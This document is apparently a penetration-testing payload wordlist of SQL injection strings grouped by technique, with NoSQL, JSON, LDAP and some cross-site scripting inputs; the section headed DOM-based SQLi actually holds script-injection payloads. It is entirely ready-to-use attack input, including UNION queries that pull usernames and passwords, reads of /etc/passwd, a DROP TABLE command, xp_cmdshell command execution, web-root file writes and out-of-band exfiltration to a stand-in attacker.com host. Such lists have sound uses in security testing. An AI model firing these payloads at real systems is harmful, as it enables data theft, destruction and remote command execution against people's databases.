# ========================
# BASIC SQL INJECTION
# ========================
'
''
' OR '1'='1
' AND '1'='2
' OR 'x'='x
';--
') OR ('1'='1
' UNION SELECT NULL, NULL, NULL--
'; DROP TABLE users;--
' OR '1'='1' /*
' OR '1'='1' --
' OR '1'='1' #
' AND 1=1--
' AND 1=2--
' OR 1=1--
' OR 1=2--
1'1
1' OR '1'='1
1'or'1'='1
1 or 1=1
1or1=1
1 AND 1=1
1 AND 1=2
1' AND 1=1--
1' AND 1=2--
1' AND '1'='1
1' AND '1'='2

# ========================
# UNION-BASED SQLi
# ========================
' UNION SELECT 1,2,3--
' UNION SELECT NULL,username,password FROM users--
' UNION SELECT 1,@@version,3--
' UNION ALL SELECT 1,table_name,3 FROM information_schema.tables--
' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT 1,load_file('/etc/passwd'),3--
' UNION SELECT 1,2,3,4,5--

# ========================
# ERROR-BASED SQLi
# ========================
' AND GTID_SUBSET(@@version,0)-- 
' AND extractvalue(1,concat(0x3a,@@version))-- 
' OR updatexml(1,concat(0x3a,(SELECT @@version)),1)-- 
' OR (SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(SELECT @@version),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x.a)--

# ========================
# TIME-BASED BLIND SQLi
# ========================
' OR IF(1=1,SLEEP(5),0)-- 
' OR (SELECT * FROM (SELECT(SLEEP(5)))a)-- 
' OR BENCHMARK(10000000,MD5('test'))-- 
' OR 1=1 WAITFOR DELAY '0:0:5'-- 

# ========================
# OUT-OF-BAND (OOB) EXFILTRATION
# ========================
' OR (SELECT LOAD_FILE(concat('\\\\',(SELECT @@version),'.attacker.com\\share\\'))-- 
' OR (SELECT 1 INTO OUTFILE '/var/www/html/loot.txt')-- 

# ========================
# WAF/FILTER BYPASS
# ========================
'/**/OR/**/'1'='1
'/*!50000OR*/1=1--
'||'1'='1
' XOR '1'='1'
'='
' LIKE '
' BETWEEN 0 AND 1--
' DIV 1--
' IS NOT NULL--

# ========================
# MSSQL-SPECIFIC
# ========================
'; EXEC xp_cmdshell('whoami')-- 
'; EXEC master..xp_cmdshell 'net user'-- 
' OR '1'='1'; EXEC sp_configure 'show advanced options',1; RECONFIGURE;--

# ========================
# MYSQL-SPECIFIC
# ========================
' INTO OUTFILE '/tmp/test.txt'-- 
' INTO DUMPFILE '/etc/passwd'-- 
' OR BINARY 'a'='A'-- 

# ========================
# ORACLE-SPECIFIC
# ========================
' OR (SELECT utl_inaddr.get_host_name((SELECT user FROM dual)) FROM dual)-- 
' AND (SELECT CTXSYS.DRITHSX.SN(1,(SELECT user FROM dual)) FROM dual)=1-- 

# ========================
# NOSQL INJECTION (MongoDB)
# ========================
' || 1==1//
'; return true
' || 'a'=='a
{"$where": "1 == 1"}
{"$gt": ""}
'; sleep(5000)//

# ========================
# JSON-BASED SQLi
# ========================
{"username":"admin'--","password":"x"}
{"username":"admin' OR 1=1--","password":"x"}
{"username":{"$ne":"invalid"},"password":{"$ne":"invalid"}}
{"username":"admin' UNION SELECT 1,2,3--","password":"x"}

# ========================
# SECOND-ORDER ATTACKS
# ========================
admin'--
admin'/*
admin'#
admin' OR 1=1--
admin' UNION SELECT 1,load_file('/etc/passwd'),3--
admin';(SELECT * FROM users)--

# ========================
# DOM-BASED SQLi
# ========================
<script>alert(1);</script>
<img src=x onerror="alert(1)">
';alert(1)//

# ========================
# LDAP INJECTION
# ========================
*)(uid=*))(|(uid=*
*))%00
admin)(&)
